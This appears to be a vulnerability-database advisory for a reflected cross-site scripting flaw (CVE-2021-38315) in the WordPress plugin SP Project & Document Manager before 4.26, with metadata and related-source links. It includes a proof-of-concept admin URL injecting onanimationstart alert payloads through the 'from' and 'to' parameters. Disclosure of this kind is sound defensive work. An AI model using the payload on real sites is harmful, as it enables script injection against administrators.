Lucene search
WpvulndbWPEX-ID:48A8A71E-3B16-4A27-8C29-BEF909B8C544HistoryAug 16, 2021 - 12:00 a.m.
SP Project & Document Manager < 4.26 - Reflected Cross-Site Scripting
2021-08-1600:00:00
wpvulndb
97
sp project manager
document manager
cross-site scripting
EPSS
0.001
Percentile
32.7%
The plugin is vulnerable to attribute-based Reflected Cross-Site Scripting via the from and to parameters in the ~/functions.php file which allows attackers to inject arbitrary web scripts
https://example.com/wp-admin/admin.php?page=sp-client-document-manager&from=" style=animation-name:rotation onanimationstart=alert(/XSS-from/)//&to=" style=animation-name:rotation onanimationstart=alert(/XSS-to/)//Related
wpvulndb
wpvulndb
SP Project & Document Manager < 4.26 - Reflected Cross-Site Scripting
2021-08-16 00:00:00
prion
prion
Cross site scripting
2021-08-16 19:15:00
patchstack
patchstack
cve
cve
CVE-2021-38315
2021-08-16 19:15:15
nvd
nvd
CVE-2021-38315
2021-08-16 19:15:15
cvelist
cvelist